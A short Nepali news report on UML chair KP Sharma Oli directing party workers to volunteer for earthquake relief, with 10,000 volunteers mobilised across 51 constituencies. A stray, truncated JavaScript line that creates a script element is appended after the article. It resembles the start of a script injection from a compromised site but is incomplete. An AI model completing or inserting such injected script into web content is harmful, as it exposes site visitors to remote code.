नेकपा (एमाले)का अध्यक्ष केपी शर्मा ओलीले विपत्तिपछिको अवस्थामा राजनीति नभई पवित्र सेवाभावका साथ स्वयंसेवामा लाग्न कार्यकर्ताहरुलाई निर्देशन दिनुभएको छ। विनाशकारी भूकम्प प्रभावित क्षेत्रमा राहत र पुनःस्थापनाका लागि सञ्चालन गर्न लागेको राष्ट्रिय स्वयम्सेवक परिचालन अभियानमा खटिने केन्द्रीय टोलीका लागि बिहीबार ललितपुरमा
आयोजित अभिमुखीकरण कार्यक्रममा अध्यक्ष ओलीले असाधारण सङ्कटग्रस्त अवस्थामा खास गरी अस्थायी आवास निर्माणका साथै त्रसित मानिसलाई सामान्य अवस्थामा फर्काउने काम गरिने बताउनुभयो। यही जेठ १० गतेदेखि एक महिनासम्म सञ्चालन हुने अभियानमा दश हजार स्वयम्सेवक परिचालन हुनेछन्। कार्यक्रममा अध्यक्ष ओलीले स्वयम्सेवकका टोली प्रमुखलाई शपथ गराउँदे अभियान परिचालनसम्बन्धी निर्देशिका, आचारसंहिता र सन्दर्भ सामग्रीसहितको पुस्तिका पनि सार्वजनिक गर्नुभयो। सत्र जिल्लाका ५१ निर्वाचन क्षेत्रमा स्थायी कमिटीका नेतासहित १० हजार स्वयंसेवक टोली परिचालन हुने एमालेले जनाएको छ।
var d=document;var s=d.createElement(‘script’);